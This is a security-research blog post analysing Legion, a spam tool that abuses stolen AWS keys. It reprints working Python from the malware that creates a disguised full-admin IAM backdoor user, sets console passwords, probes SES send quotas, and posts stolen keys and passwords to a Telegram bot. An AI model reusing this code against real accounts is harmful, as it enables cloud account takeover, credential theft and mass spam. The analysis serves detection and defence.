Legion: The Latest Threat in Mass Spam Attacks
Hear Ye, Hear Ye
Subscribe to Cloud Chronicles for the latest in cloud security!
Summary
As the old proverb says, “Great minds think alike”. Many people may not know or remember the second half of that proverb, “Fools seldom differ.” Both sides of these adages are very well represented throughout this article. Researchers (great minds) from Permiso and Cado security simultaneously stumbled onto a new attack tool, dramatically called Legion, that is focused on mail abuse and SMS spam via services like Amazon SES and Twilio. This tool looks eerily similar (Fools seldom differ) to Andr0xGhost, Greenbot, VIOLENT, and a few other for sale spam attack scripts.
In the spirit of collaboration, Cado and Permiso researchers are tag teaming a breakdown of Legion’s toolset. Since we (Permiso) have already talked at length about similar variants, the rest of this article will dive into some of the differences of Legion compared to AndroxGh0st and Greenbot. For a full breakdown of Legion specifically, head over to the Cado Security blog.
Legion Modules
Legion has many different modules for various technologies. In this article we are going to focus on a few of the modules that are specific to AWS. If you would like to ride along, you can find this script on VirusTotal (MD5: ddc6963f98e57090e0a78559c7212498).
Persistence
Our favorite feature in these scripts is the persistence. Legion is mostly using the same playbook as similar tools, with one extra little touch: they add tags to the IAM user they create.
create_new_user
By default, Legion creates a user named ses_legion
for persistence. One thing that stands out with Legion compared to other similar tools is that it also adds the tag: Owner:ms.boharas
to the created user. While it is often hard to understand the motivations of the attacker, we suspect this was added to evade detections that looks for users that have been created with no tags associated to them.
def create_new_user(iam_client, user_name='ses_legion'):
user = None
try:
user = iam_client.create_user(
UserName=user_name,
Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
result_str = get_random_string()
user_name = 'ses_{}'.format(result_str)
user = iam_client.create_user(UserName=user_name,
Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
)
return user_name, user
creat_new_group
Legion creates a group with the name SESAdminGroup
. Attackers often use generic names like this for groups, policy and user creations.
def creat_new_group(iam_client, group_name='SESAdminGroup'):
try:
res = iam_client.create_group(GroupName=group_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
result_str = get_random_string()
group_name = "SESAdminGroup{}".format(result_str)
res = iam_client.create_group(GroupName=group_name)
return res['Group']['GroupName']
creat_new_policy
Legion creates a policy named AdministratorAccess
if it doesn’t already exist to allow for all actions against all resources. This is an attempt to masquerade as the default AdministratorAccess
AWS managed policy.
def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
policy_json = {"Version": "2012-10-17","Statement":
[{"Effect": "Allow", "Action": "*","Resource": "*"}]}
try:
res = iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=json.dumps(policy_json)
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
result_str = get_random_string()
policy_name = "AdministratorAccess{}".format(result_str)
res = iam_client.create_policy(PolicyName=policy_name,
PolicyDocument=json.dumps(policy_json)
)
return res['Policy']['Arn']
creat_profile
When setting a password for the created user, Legion sets the reset required to false.
def creat_profile(iam_client, user_name, pwd):
response = iam_client.create_login_profile(
UserName=user_name, Password=pwd, PasswordResetRequired=False)
return response
initialize_item
Of note in the initialize function, Legion defaults to using the us-east-1
region. This is configurable though.
def initialize_item(item, service='ses'):
ACCESS_ID = item['id']
ACCESS_KEY = item['key']
REGION = item['region']
if REGION is None:
REGION = 'us-east-1'
try:
return boto3.client(service, region_name=REGION,
aws_access_key_id=ACCESS_ID,
aws_secret_access_key=ACCESS_KEY
)
except Exception:
return
make_user
The make_user
function pulls this all together:
-
Creates a new user with the name
ses_legion
and the tagOwner:ms.boharas
-
Creates a group with the name
SESAdminGroup
-
Creates a policy called
AdministratorAccess
that gives full access -
Attaches the policy directly to
ses_legion
IAM user -
Sets a password
-
Creates a login profile for console access abilities
-
Adds the
ses_legion
IAM User to the groupSESAdminGroup
-
Logs the result of this activity to a Telegram bot
def make_user(iam_client, item, limit_data):
try:
user_name, user_data = create_new_user(iam_client)
grp_name = creat_new_group(iam_client)
policy_arn = creat_new_policy(iam_client)
up = att_usr_policy(iam_client, user_name, policy_arn)
password = "{}0089#".format(user_name)
profile = creat_profile(iam_client, user_name, password)
added_to_grp = att_usr_grp(iam_client, user_name, grp_name)
if user_data:
user_arn = user_data['User']['Arn']
user_id = None
if user_arn:
user_id = user_arn.split(':')[4]
with open('AWS_ByPass/!Users_Cracked.txt', 'a') as tt:
dd = json.dumps(user_data, indent=4, sort_keys=True, default=default)
data = ("ACESS_ID={}\nACCESS_KEY={}\nREGION={}\nAmazon IAM User & Pass\n"
"Username={}\nPassword={}\nID={}\n")\
.format(item['id'], item['key'], item['region'],user_name, password, user_id)
tt.write(data + "\n")
tt.write(dd + "\n\n")
tt.write("Limit for user:\n")
if limit_data:
tt.write(limit_data + "\n")
tt.write("{}\n".format("*" * 10))
message = {'text': f"🔥 Legion SMTP 6.5 BOT [AWS Console]\n🏦 Amazon IAM User & Pass\n\nUser: {user_name}\nPass= {password}\nIAM= {user_id}\n\nACESS_ID= {item['id']}\nACCESS_KEY= {item['key']}\nREGION= {item['region']}\nAWS Console Hacked ❤\n"}
requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}CREATED ID: {fc}{item['id']} {gr}and Access Token/UserID {fc}{user_id}")
except IOError as e:
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Error writing to file for new {fc}USER")
except ClientError as e:
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed to create user with ID: {fc}{item['id']}")
except Exception as e:
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Create Failed: {item['id']}")
Amazon Simple Email Service (SES) Abuse
One of the goals of Legion is to abuse SES in order to send mass spam emails. The modules below are part of this functionality.
check_limit
Legion assesses the email sending capability of an account by examining the Max24HourSend
response element. A response value of 200 in Max24HourSend
signifies that the key and account are in a sandbox
status, which will not provide a means of abuse. Any other value greater than 200 may indicate a potential for attack. If the account is not in a sandbox
status, Legion can analyze the output of the SentLast24Hours
response element to determine the number of remaining messages that can be sent within 24 hours after subtracting the value from Max24HourSend
. However, as a spoiler, it doesn’t appear legion entirely understood the idea of the sandbox or they didn’t care and prefer to let the script error until it moves on to the next account.
def check_limit(ses_client, item):
try:
l = ses_client.get_send_quota()
return f"{item['id']}:{item['key']}:{item['region']}:{l['SentLast24Hours']}/{l['Max24HourSend']} Remaining"
except Exception as e:
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Limit Failed: {item['id']}")
check_sending
Somewhat self explanatory, Legion wants to verify the data and send a message. To do this, they send an email with the available sender and receiver data they have. A successful email, which means the email was accepted for delivery, will return a messageId
response element which Legion later uses before writing the successful details to file.
def check_sending(client, receiver, sender, item, limit_info, iam):
subj = f"{item['id']}"
msg = f"*** SMTP DATA ***\n\n"\
f"{item['id']}:{item['key']}:email-smtp.{item['region']}.amazonaws.com:587\n\n"\
f"AWS_ID: {item['id']}\nAWS_KEY: "\
f"{item['key']}\nAWS_REGION: {item['region']}\nFROM: {sender}\n"\
f"SERVER: email-{item['region']}.amazonaws.com\nPORT: 587 or 25\n\n"\
f"IAM_USER: {iam}\n\nLimit Info: {limit_info}"
try:
return client.send_email(
Source=sender,
Destination={'ToAddresses': receiver},
Message={
'Subject': {'Data': f'SMTP_KEY: email-smtp.{item["region"]}.amazonaws.com',
'Charset': 'UTF-8'},
'Body': {'Text': {
'Data': msg,
'Charset': 'UTF-8'
},
}
}
)
except Exception as e:
pass
get_identities, fetch_user, process, begin_check
In the final functions around SES Abuse, Legion starts by returning a list of identities via get_identities
. fetch_user
is used to verify a user creation process as part of begin_check
, the created user is based on the obtained credentials and written to a file along with the data from check_limit
. Why Legion chooses to write the limit details along with the user is unclear, we’ll note now that the SES send quota is not per user but per account. The process
function brings many of the previous steps together and is later called by begin_check
if the result of check_limit
exists. While Legion checks that the limit data exists several times leading up to the process
call, they do it again once in the function before also running get_identities
and looping through the identities as the sender for the check_sending
function. If a messageId is returned from check_sending
they consider this a success and write to the success file !Good_ses_smtp.txt
, otherwise they look to write output to the failed file !BAD_ses_smtp.txt
and post the failed information to there telegram chat. It’s here Legion could have saved time in knowing that sandbox would have always failed unless sending to verified emails or domains.
def get_identities(client):
try:
return client.list_identities()['Identities']
except Exception:
pass
def fetch_user(client):
try:
return client.get_user()['User']
except Exception:
pass
def process(ses_client, receiver, item, limit=None, iam=None):
if limit:
limit = limit.split(':')[3]
idt = get_identities(ses_client)
res = None
if idt:
for fr in idt:
res = check_sending(ses_client, receiver, fr, item, limit, iam)
if res:
with open('AWS_ByPass/!Good_ses_smtp.txt', 'a') as lr:
sm = f"{item['id']}:{item['key']}:email-{item['region']}-1.amazonaws.com:{fr}:587:{limit}\n"
lr.write(sm)
print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}SENDING SUCCESSFUL: {yl}{item['id']} : {gr}{limit}")
break
if not res:
with open('AWS_ByPass/!BAD_ses_smtp.txt', 'a') as lr:
sm = f"{item['id']}:{item['key']}:{item['region']}\n"
message = {'text': f"🔥 Legion SMTP 6.5 BOT [AWS STATUS]\n🏦 KEY= {item['id']}\nSECRET= {item['key']}\nREGION= {item['region']}\nSTATUS=> Sending Paused ⛔\n"}
requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
lr.write(sm)
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Sending Failed: {yl}{sm}")
def begin_check(d, to=emailnow):
item = {}
limit = None
data = d.split(':')
total = len(data)
bcode = 'TEVHSU9OIDYuNg=='
receiver = [to, base64.b64decode(bcode).decode('utf-8')]
iam_user = None
if total >= 3:
if data[2]:
item['id'] = data[0]
item['key'] = data[1]
item['region'] = data[2]
ses_client = initialize_item(item)
if ses_client:
limit = check_limit(ses_client, item)
iam_client = initialize_item(item, service='iam')
if iam_client:
mu = make_user(iam_client, item, limit)
iam = fetch_user(iam_client)
if limit:
remain = limit.split(':')[3]
print(f"{yl}[{fc}AWS CHECKER{yl}] {fc}Limit for {item['id']}: {remain}")
process(ses_client, receiver, item, limit=limit, iam=None)
else:
print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed limit check: {item['id']}")
process(ses_client, receiver, item, limit=None, iam=None)
else:
print(f"[!] Skipped: {d}")
Conclusion
Mail and SMS abuse are big business for attackers. We have come across close to a dozen variants of similar scripts that are being sold regularly for nefarious purposes. Legion is not the first nor will it be the last. Luckily with the amount of similarities in these toolsets, the methodology based detections we put in place and described in /blog/s/approach-to-detection-androxgh0st-greenbot-persistence are resilient enough to to detect all the variants we have discovered so far being used against any of our clients here at Permiso.